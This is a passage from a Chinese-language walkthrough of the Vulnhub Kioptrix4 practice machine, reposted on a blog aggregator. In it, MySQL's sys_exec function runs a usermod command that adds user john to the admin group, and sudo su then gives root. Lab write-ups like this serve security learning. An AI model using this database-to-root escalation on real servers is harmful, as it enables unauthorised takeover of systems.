ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql> SELECT sys_exec('usermod -a -G admin john');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql
 
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.07 sec)
 
</pre><p>利用<code>SELECT sys_exec('usermod -a -G admin');</code>將<code>john</code>加入管理員組</p><pre class="md-fences mock-cm md-end-block" lang="">john@Kioptrix4:/tmp$ sudo su
[sudo] password for john: 
root@Kioptrix4:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/tmp# whoami
root
</pre><p>這樣我們得到了root權限。</p></div>
</body>
</html>

  

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 vulnhub靶場—devguru Vulnhub實戰靶場:CENGBOX: 3 Vulnhub 靶場 Red: 1 Vulnhub 靶場 NAPPING: 1.0.1 Vulnhub 靶場 NOOB: 1 Vulnhub 靶場 CORROSION: 2 Vulnhub 靶場 DRIPPING BLUES: 1 Vulnhub 靶場 VIKINGS: 1 Vulnhub 靶場 EMPIRE: BREAKOUT Vulnhub 靶場 EMPIRE: LUPINONE
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM